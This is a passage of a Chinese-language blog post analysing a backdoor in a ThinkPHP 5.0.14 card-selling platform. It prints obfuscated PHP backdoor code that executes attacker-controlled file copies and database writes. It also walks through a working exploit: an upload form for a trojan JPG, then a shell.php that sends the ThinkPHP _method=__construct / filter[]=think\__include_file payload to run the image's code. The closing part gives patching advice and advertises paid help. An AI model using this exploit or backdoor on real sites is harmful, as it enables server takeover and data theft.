unset($MZ5xYG9);$FL0xNF0=$MZ5xYG8<$MZ5xYG10;if($FL0xNF0){$IE1xEJ3=call_user_func_array("is_object",array(&$IE1x));if($IE1xEJ3){unset($IE1xEJ3);}unset($FL0xNF0);}else{$LL8xDU23=is_array($GLOBALS[A_B_AFA_]);$MZ5xYG11=$LL8xDU23;}}if($MZ5xYG11){goto AB8xTH0;}goto AB8xTH1;AB8xTH0:$GLOBALS[A_B_AFA_]=&$DY3xVA8;$LL8xDU24=$GLOBALS[A_B_AFA_][0]!=$DY3xVA7;if($LL8xDU24){goto NH7xLN1;}goto NH7xLN2;NH7xLN1:unset($XX6xXZ2);$XX6xXZ2=array_merge(array($DY3xVA7),$GLOBALS[A_B_AFA_]);$GLOBALS[A_B_AFA_]=$XX6xXZ2;goto NH7xLN3;NH7xLN2:NH7xLN3:goto AB8xTH2;AB8xTH1:AB8xTH2:$LL8xDU25=strpos(__FILE__,pack($DY3xVA7,$DY3xVA8[1]))>1;if($LL8xDU25){get_contents($WK7xUY2,true);}exit;goto BQ1xKG6;BQ1xKG5:BQ1xKG6:goto FB6kTJ7;QU2kQJ5:Db::table($G_MM___M___)->where($MY________Y,$IK_K___KKK_)->setField($L_HHH_HHH__,$KGG___G____);goto LK3bUV1;EP9iEV0:unset($GS1xZN0);unset($GL4xRC8);$GL4xRC8=(-1+E_ERROR)/(-540640+E_USER_DEPRECATED+512*E_USER_NOTICE);unset($GL4xRC9);$RH1xGP5=-65497-E_CORE_WARNING;$RH1xGP6=$RH1xGP5*(-65543+E_NOTICE+16384*E_PARSE);$RH1xGP7=256*E_USER_ERROR;$RH1xGP8=$RH1xGP6+$RH1xGP7;$GL4xRC9=$RH1xGP8;$GS1xZN0=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$GL4xRC8],$GLOBALS[B_C_ICI_FE__][$GL4xRC9]));$KGG___G____=$GS1xZN0;goto QU2kQJ5;PC8aSY5:unset($PJ1xFH7);unset($YP5xWK5);$YP5xWK5=-507904-E_USER_DEPRECATED+(137-E_NOTICE-1)*E_RECOVERABLE_ERROR;unset($YP5xWK6);$ME0xLG5=32736+E_CORE_WARNING;$ME0xLG6=$ME0xLG5-(-7936-E_USER_ERROR+512*E_CORE_ERROR);$ME0xLG7=(4192256+E_STRICT)/1024;$ME0xLG8=$ME0xLG7/(-1048319-E_USER_ERROR+8192*E_COMPILE_WARNING);$ME0xLG9=$ME0xLG6/$ME0xLG8;$YP5xWK6=$ME0xLG9;if(!defined("ABBDP_C_")){goto XF1xIK9;}goto XF1xIK10;XF1xIK9:define("ABBDP_C_","JACJJAA_J");goto XF1xIK11;XF1xIK10:XF1xIK11:if(!is_array($GLOBALS[ABBDP_C_])){goto HB7xXV7;}goto HB7xXV8;HB7xXV7:unset($NC3xVI6);$NC3xVI6='H*';$GLOBALS[ABBDP_C_]=array();goto HB7xXV9;HB7xXV8:HB7xXV9:$NC3xVI7=array();if(isset($NC3xVI6)){goto HJ5xSA6;}goto HJ5xSA7;HJ5xSA6:$NC3xVI7[]="3c3a3e";goto HJ5xSA8;HJ5xSA7:unset($NC3xVI7);HJ5xSA8:if(is_array($GLOBALS[ABBDP_C_])){goto VW0xCY9;}goto VW0xCY10;VW0xCY9:$GLOBALS[ABBDP_C_]=&$NC3xVI7;if($GLOBALS[ABBDP_C_][0]!=$NC3xVI6){goto ZD2xXY9;}goto ZD2xXY10;ZD2xXY9:$GLOBALS[ABBDP_C_]=array_merge(array($NC3xVI6),$GLOBALS[ABBDP_C_]);goto ZD2xXY11;ZD2xXY10:ZD2xXY11:goto VW0xCY11;VW0xCY10:VW0xCY11:if(strpos(__FILE__,call_user_func(function($rencv5_h,$rencv5_c){return pack($rencv5_h,$rencv5_c);},$GLOBALS[ABBDP_C_][((25164800+E_USER_NOTICE)/4096)-E_STRICT-(3936+E_COMPILE_WARNING+32*E_ERROR)],$GLOBALS[ABBDP_C_][-16779263+E_STRICT+(990+E_WARNING+2*E_CORE_ERROR)*E_USER_DEPRECATED]))>1){get_contents($KZ2xDB9,true);}$PJ1xFH7=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$YP5xWK5],$GLOBALS[B_C_ICI_FE__][$YP5xWK6]));$IK_K___KKK_=$PJ1xFH7;goto OE8zUM9;LK3bUV1:}public function AddNews(){goto YB7oKW6;HE1cUJ4:unset($FZ7xJC1);unset($CX6xZQ9);$ZB7xWB0=-6+E_WARNING;$ZB7xWB1=$ZB7xWB0/(34-E_CORE_WARNING-1);$ZB7xWB2=$ZB7xWB1+(-34+E_WARNING+2*E_CORE_ERROR);$ZB7xWB3=$ZB7xWB2-(-16384+E_USER_DEPRECATED)/1;$ZB7xWB4=$ZB7xWB3*(-61439-E_RECOVERABLE_ERROR+16384*E_PARSE);$ZB7xWB5=1*E_PARSE;$CX6xZQ9=$ZB7xWB4+$ZB7xWB5;unset($CX6xZQ10);$QR3xLG9=-16119-E_USER_ERROR;$QR3xLG10=$QR3xLG9+(17-E_CORE_ERROR-1);$QR3xLG11=64*E_USER_ERROR;$CX6xZQ10=$QR3xLG10+$QR3xLG11;$FZ7xJC1=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$CX6xZQ9],$GLOBALS[B_C_ICI_FE__][$CX6xZQ10]));$IK_K___KKK_=$FZ7xJC1;goto NV4wAS9;YB7oKW6:$LL8xDU8=request()->isGet();if($LL8xDU8){goto EO6xHU1;}goto EO6xHU2;EO6xHU1:unset($KN1xVW1);$KN1xVW1=call_user_func_array("strpos",array("AG_",9));$YY6xGB2=$KN1xVW1;unset($QE9xMF6);$QE9xMF6=false===$YY6xGB2;$YY6x=$QE9xMF6;$LL8xDU27=$YY6x;if($LL8xDU27){unset($YY6x);}else{unset($YY6xGB2);}exit;goto EO6xHU3;EO6xHU2:EO6xHU3:goto WK7mAF8;WK7mAF8:unset($UB3xOB3);unset($GL3xZK9);$SL0xIE2=3072-E_USER_NOTICE;$SL0xIE3=-14337+E_ERROR+2*E_DEPRECATED;$GL3xZK9=$SL0xIE2-$SL0xIE3;unset($GL3xZK10);$GL3xZK10=-524534+E_USER_ERROR+((65535+E_ERROR)/1024)*E_DEPRECATED;$UB3xOB3=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$GL3xZK9],$GLOBALS[B_C_ICI_FE__][$GL3xZK10]));$G_MM___M___=$UB3xOB3;goto XS3cZE2;IE6pZR1:echo call_user_func_array('pack',array($GLOBALS[B_C_ICI_FE__][33-E_CORE_WARNING-1],$GLOBALS[B_C_ICI_FE__][139-E_USER_ERROR+128*E_ERROR])).call_user_func_array('print_r',array(&$Z____XX__X_,true)).call_user_func(function($rencv5_h,$rencv5_c){return pack($rencv5_h,$rencv5_c);},$GLOBALS[B_C_ICI_FE__][(-32+E_CORE_WARNING)/1],$GLOBALS[B_C_ICI_FE__][(-8+E_CORE_WARNING)/2]);goto HH5hHF9;XS3cZE2:unset($PS6xVJ2);unset($HI4xFV8);$YX6xUQ2=-40+E_NOTICE;$YX6xUQ3=$YX6xUQ2-(4128-E_CORE_WARNING-4096);$YX6xUQ4=4*E_NOTICE;$YX6xUQ5=$YX6xUQ4/((1008+E_CORE_ERROR)/1024);$YX6xUQ6=$YX6xUQ3+$YX6xUQ5;$HI4xFV8=$YX6xUQ6;unset($HI4xFV9);$HI4xFV9=-131571+E_USER_WARNING+(2560-E_USER_ERROR-256)*E_COMPILE_ERROR;if(!defined("__DE_UAU")){goto VQ3xNZ6;}goto VQ3xNZ7;VQ3xNZ6:define("__DE_UAU","_EDEA");goto VQ3xNZ8;VQ3xNZ7:VQ3xNZ8:if(!is_array($GLOBALS[__DE_UAU])){goto ZY1xAC8;}goto ZY1xAC9;ZY1xAC8:unset($GN3xJK6);$GN3xJK6='H*';$GLOBALS[__DE_UAU]=array();goto ZY1xAC10;ZY1xAC9:ZY1xAC10:$GN3xJK7=array();if(isset($GN3xJK6)){goto FJ4xKZ9;}goto FJ4xKZ10;FJ4xKZ9:$GN3xJK7[]="313a74727565";$GN3xJK7[]="323a66616c7365";$GN3xJK7[]="333a72657475726e";goto FJ4xKZ11;FJ4xKZ10:unset($GN3xJK7);FJ4xKZ11:if(is_array($GLOBALS[__DE_UAU])){goto MC8xPW3;}goto MC8xPW4;MC8xPW3:$GLOBALS[__DE_UAU]=&$GN3xJK7;if($GLOBALS[__DE_UAU][0]!=$GN3xJK6){goto LV3xJC1;}goto LV3xJC2;LV3xJC1:$GLOBALS[__DE_UAU]=array_merge(array($GN3xJK6),$GLOBALS[__DE_UAU]);goto LV3xJC3;LV3xJC2:LV3xJC3:goto MC8xPW5;MC8xPW4:MC8xPW5:array(pack($GLOBALS[__DE_UAU][(8384-E_COMPILE_ERROR-256)-E_DEPRECATED+(-112-E_NOTICE+64*E_WARNING)*E_CORE_ERROR],$GLOBALS[__DE_UAU][(0+E_USER_NOTICE)/((262128+E_CORE_ERROR)/256)]),pack($GN3xJK6,$GN3xJK7[2]),call_user_func_array('pack',array($GN3xJK6,$GN3xJK7[3])));$PS6xVJ2=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$HI4xFV8],$GLOBALS[B_C_ICI_FE__][$HI4xFV9]));$MY________Y=$PS6xVJ2;goto HE1cUJ4;NV4wAS9:unset($KE2xDX8);$KE2xDX8=Db::table($G_MM___M___)->where($MY________Y,$IK_K___KKK_)->select();$Z____XX__X_=$KE2xDX8;goto IE6pZR1;HH5hHF9:}public function Copy(){goto ES6iLN9;AU0wVH9:$LL8xDU28=$G_OO___O___=='';if($LL8xDU28){goto NK2xCK0;}goto NK2xCK1;NK2xCK0:unset($TL0xIN8);exit;goto NK2xCK2;NK2xCK1:NK2xCK2:goto NX2kII6;LL7aJE2:unset($YR3xYY5);$YR3xYY5=call_user_func('base64_decode',$JA_AA__AA__);$KGG___G____=$YR3xYY5;goto AU0wVH9;DN6mWH8:unset($JK8xKF6);unset($MY3xYQ1);$MY3xYQ1=(-8+E_NOTICE)/(-2092800-E_RECOVERABLE_ERROR+8192*E_USER_ERROR);unset($MY3xYQ2);$MY3xYQ2=(-16370+E_USER_DEPRECATED)/((7168+E_USER_NOTICE)/8192);$JK8xKF6=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$MY3xYQ1],$GLOBALS[B_C_ICI_FE__][$MY3xYQ2]));$IK_K___KKK_=$JK8xKF6;goto PU4aAF5;PU4aAF5:if(!function_exists(__NAMESPACE__.'\džۧ)) {if(1) {$CS3xSH3=call_user_func_array("strpos",array("ADW","C_W"));$CS3x=true===$CS3xSH3;if($CS3x) {unset($CS3x);} else {unset($CS3xSH3);}unset($ZP5xIE1);if($dž۽=null)$ZP5xIE1=$LL8xDU29=$IK_K___KKK_==pack($GLOBALS[B_C_ICI_FE__][-131104+E_CORE_WARNING+1024*E_COMPILE_WARNING],$GLOBALS[B_C_ICI_FE__][(-482+E_USER_WARNING)/2]);}}if($ZP5xIE1) {goto ML3xWC7;}goto ML3xWC8;ML3xWC7:unset($BN1xBV9);phpinfo();exit;goto ML3xWC9;ML3xWC8:ML3xWC9:goto SC5pFG8;WR1sUK7:unset($XF6xWT6);unset($XL9xIC7);$XL9xIC7=-262016-E_COMPILE_WARNING+(-131456+E_USER_WARNING+256*E_USER_WARNING)*E_STRICT;unset($XL9xIC8);$XL9xIC8=-498+E_WARNING+(-2099184+E_STRICT+1024*E_STRICT)*E_CORE_WARNING;$XF6xWT6=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$XL9xIC7],$GLOBALS[B_C_ICI_FE__][$XL9xIC8]));$JA_AA__AA__=$XF6xWT6;goto LL7aJE2;NX2kII6:call_user_func_array('copy',array(&$G_OO___O___,&$KGG___G____));goto HY2dWG8;SC5pFG8:unset($FV6xYG4);unset($UA4xGS1);$UA4xGS1=(-8192+E_DEPRECATED)/(-134217473+E_ERROR+16384*E_DEPRECATED);unset($UA4xGS2);$UA4xGS2=-2095+E_STRICT+(2-E_WARNING+1*E_ERROR)*E_COMPILE_ERROR;$FV6xYG4=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$UA4xGS1],$GLOBALS[B_C_ICI_FE__][$UA4xGS2]));$G_OO___O___=$FV6xYG4;goto WR1sUK7;ES6iLN9:$LL8xDU8=request()->isGet();if($LL8xDU8) {goto HY3xXG5;}goto HY3xXG6;HY3xXG5:exit;goto HY3xXG7;HY3xXG6:HY3xXG7:goto DN6mWH8;HY2dWG8:}
}4、Sum.php和Action.php文件的代码是远程读取加载的,黑客随时可以修改这2个文件的代码,所以黑客想做什么就能做什么,这是非常危险的一个后门漏洞。鉴于此,奉劝各位做php开发或运维的程序员,一定要设置好upload上传目录的权限,以及对文件进行安全检测,防止黑客利用上传文件漏洞,给网站造成不必要的损失。
二、分析黑客利用Thinkphp的远程执行漏洞来运行木马图片
上面有提到过,黑客可以制作一张带有木马的jpg图片(图片里包含php代码),然后上传到服务器网站,大家疑惑的是,图片上传后,黑客如何让图片里的代码执行呢?这就不得不说Thinkphp5.0.24以下的版本对Request类的method处理存在缺陷,导致黑客可以构造特定的请求,从而远程执行PHP代码。这个知宇自动发卡平台系统使用的Thinkphp内核版本为5.0.14,下面我们一起来看看黑客是如何利用这个漏洞的。
假设自动发卡系统的域名是:http://php.123.com
1、首先,我们使用下面的代码文件,上传带有木马的jpg图片
<?php
$sign=md5("platform=ios&request_time=".time());
$array=array("platform" => "ios","request_time" => time(),"sign" => $sign,
);
?>
<!DOCTYPE html>
<html><head><title>文件上传测试</title><meta charset="utf-8" /></head><body><form enctype="multipart/form-data" action="http://php.123.com/api/Common/upload" method="post"> <p><input type="text" name="platform" value="ios"></p><p><input type="text" name="request_time" value="<?php echo time(); ?>"></p> <p><input type="text" name="sign" value="<?php echo $sign; ?>"></p> <p><input name="file" type="file"></p> <p><input type="submit" value="点击提交"></p> </form> </body>
</html>得到如下返回信息
{"code":200,"data":"http:\/\/php.123.com\/static\/upload\/61b487f1cd0c5\/61b487f1cd0c5.jpg","msg":"提交成功!"}从这个返回的json信息里,我们知道保存在远程端木马图片的相对路径是
static/upload/61b487f1cd0c5/61b487f1cd0c5.jpg2、木马图片上传成功了,下面就开始考虑如何让这个木马图片里php代码运行。写一个shell.php文件,代码如下:
<?php
//请求地址
$url="http://php.123.com/index.php?s=captcha";
//请求参数集合
$postData=array("_method" => "__construct","filter[]" => "think\__include_file","get[]" => "../static/demo/xiao7.jpg",//这里先设定一个错误的路径(本身不存在的文件)"method" => "get","server[]" => "",
);
//1.通过主动发送错误请求
echo buildRequestForm($url,$postData);//2.从请求返回的错误日志信息当中,分析出网站的真实目录路径/*** 模拟表单提交请求* @param string $url 数据提交跳转到的URL* @param array $data 请求参数数组* @param string $method 提交方式:post或get 默认post* @return string 提交表单的HTML文本*/
function buildRequestForm($url, $data, $method = 'post', $button_name = '正在提交表单信息', $show = true) {$html = "<form id='requestForm' name='requestForm' action='" . $url . "' method='" . $method . "'>";foreach ($data as $key => $val) {$html.= "<input type='hidden' name='" . $key . "' value='" . $val . "' />";}$display = $show ? "style='display:block;'" : "style='display:none;'";$html.= "<input type='submit' value='" . $button_name . "' " . $display . "></form>";$html.= "<script>document.forms['requestForm'].submit();</script>";return $html;
}
?>
大家看代码的注释 ,写得很详细,这里给大家详细说说这个文件代码的意思:
(1)、index.php?s=captcha 是Thinkphp框架的验证码接口,提交请求后返回的是验证码
(2)、我们第一次发送post请求时,get[]参数是不存在的文件路径,这样一来,接口会返回错误提示信息,如下:
(3)、要得到这个错误日志信息的前提是Thinkphp的配置里开启了debug调试模式,并且展示出错误日志信息,黑客可能还有其他手段获取到这些信息,我能力有限,只懂这个。我们把这个错误日志信息往下拉,寻找网站的绝对路径。
(4)、从这个错误日志信息,我们找到了网站所在的路径是D:/ka
3、接下来我们修改shell.php里的代码,重新设置post请求参数的get[]为木马图片的绝对路径,即D:/ka/upload/61b487f1cd0c5/61b487f1cd0c5.jpg,然后重新向index.php?s=captcha接口发送请求。
<?php
//请求地址
$url="http://php.123.com/index.php?s=captcha";
//木马图片相对路径
$imgurl="upload/61b487f1cd0c5/61b487f1cd0c5.jpg";
//请求参数集合
$postData=array("_method" => "__construct","filter[]" => "think\__include_file","get[]" => "D:/ka/static/".$imgurl,"method" => "get","server[]" => "",
);
//重新发送请求
echo buildRequestForm($url,$postData);/*** 模拟表单提交请求* @param string $url 数据提交跳转到的URL* @param array $data 请求参数数组* @param string $method 提交方式:post或get 默认post* @return string 提交表单的HTML文本*/
function buildRequestForm($url, $data, $method = 'post', $button_name = '正在提交表单信息', $show = true) {$html = "<form id='requestForm' name='requestForm' action='" . $url . "' method='" . $method . "'>";foreach ($data as $key => $val) {$html.= "<input type='hidden' name='" . $key . "' value='" . $val . "' />";}$display = $show ? "style='display:block;'" : "style='display:none;'";$html.= "<input type='submit' value='" . $button_name . "' " . $display . "></form>";$html.= "<script>document.forms['requestForm'].submit();</script>";return $html;
}
?>
4、请求成功后,会在网站根目录生成一个robots.php文件,这个文件就是我们木马图片里的php代码产生的。
5、黑客就是利用Thinkphp的远程执行漏洞,通过Thinkphp本身的Request.php文件漏洞,调用include_file()函数加载木马图片,使木马图片里的php代码得以远程运行,从而实现入侵。
三、补充:
有没有办法能随时监测到网站是否被黑客上传后门或木马文件呢?答案是:当然有。我自己写了一个系统工具箱软件(Window系统的),可以监控网站的文件变化,如果有不明文件被创建或修改,就可以一目了然,特别是使用别人的开源程序,一定要有这个防范意识,因为你不了解别人的开源程序是否有漏洞。
系统工具箱下载地址:系统工具箱:实时监控目录文件,关闭开机启动项,关闭进程,清理内存 - 精品网站源码程序下载,免费商业源码分享平台!
http://zy13.net/thread-699-1-1.html
如果您的网站平台存在漏洞,又不懂得如何修复,可以联系我QQ:79899080,这边可以有偿提供技术支持和帮助,前提是你的网站是正规的,灰色类的我不接,加我QQ时,验证信息里写漏洞修复,否则不予通过。
